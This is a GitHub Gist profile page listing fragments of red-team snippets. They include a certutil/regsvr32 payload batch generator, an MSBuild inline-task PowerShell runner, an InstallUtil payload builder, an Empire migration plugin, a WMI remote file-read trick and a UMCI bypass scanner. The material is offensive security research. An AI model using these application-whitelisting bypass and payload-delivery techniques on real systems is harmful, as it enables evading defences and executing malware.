Skip to content

Instantly share code, notes, and snippets.


Chris Ross xorrior

View GitHub Profile

Keybase proof

I hereby claim:

  • I am xorrior on github.
  • I am xorrior ( on keybase.
  • I have a public key whose fingerprint is A086 24A4 D702 0EAE FCEC 139D 56BA 7C93 A848 D2F7

To claim this, I am signing this object:

xorrior / LoadMethodScanner.ps1
Created Aug 11, 2017 — forked from mattifestation/LoadMethodScanner.ps1
A crude Load(byte[]) method scanner for UMCI bypass research
View LoadMethodScanner.ps1
# Author: Matthew Graeber (@mattifestation)
# Load dnlib with Add-Type first
# dnlib can be obtained here:
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference
filter Get-AssemblyLoadReference {
param (
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
xorrior / New-CplBatchFile.ps1
Last active Sep 20, 2017
Generate Batch file for cpl file
View New-CplBatchFile.ps1
function New-CplBatchFile
Generates a batch file which will contain a certutil encoded, cab compressed payload.
The batch file will decode and decompress the cab file, then execute the dll within with regsvr32. You may modify the bat file to execute whatever you want.
Create payload:
xorrior / SampleRules.plist
Created Jan 9, 2018
Sample Plist for emond
View SampleRules.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">
<string>sample rule</string>
xorrior / pshell_template_embedded_script.xml
Created Dec 20, 2016
MSBuild Powershell Script XML template
View pshell_template_embedded_script.xml
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName>
<Cmd Condition="'$(Cmd)' == ''">None</Cmd>
<Target Name="Hello">
xorrior / empire-migrationplugin.m
Created May 25, 2018
Migration Plugin with Empire Payload
View empire-migrationplugin.m
// demoClass.m
// testExampleBundle
// Created by Chris Ross on 4/17/18.
// Copyright © 2018 Void. All rights reserved.
#import <Foundation/Foundation.h>
#import <objc/objc.h>
xorrior / SMConfMigratorPlugin.h
Created Jun 18, 2018
SMConfMigratorPlugin header file
View SMConfMigratorPlugin.h
// Generated by class-dump 3.5 (64 bit).
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard.
#import "NSObject.h"
#import "SMSystem_FileManagerProtocol.h"
@class NSObject, SMMigrationRequest;
xorrior / FileReadPrimitive.ps1
Created Jun 28, 2018 — forked from mattifestation/FileReadPrimitive.ps1
A WMI file content read primitive - ROOT/Microsoft/Windows/Powershellv3/PS_ModuleFile
View FileReadPrimitive.ps1
$CimSession = New-CimSession -ComputerName
$FilePath = 'C:\Windows\System32\notepad.exe'
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
$FileLengthBytes = $FileContents.FileData[0..3]
xorrior / PowerView-3.0-tricks.ps1
Created Jul 5, 2018 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
xorrior / New-InstallUtilBatchFile.ps1
Created Oct 27, 2016
Generate InstallUtil payload within batch file for delivery
View New-InstallUtilBatchFile.ps1
function New-InstallUtilBatchFile
#You must provide an encoded payload using certutil -encode for the InFilePath.
#certutil -encode payload.exe payload.txt
#For compiling w/ a managed powershell runner
# C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\\System.Management.Automation.dll" /out:payload.exe payload.cs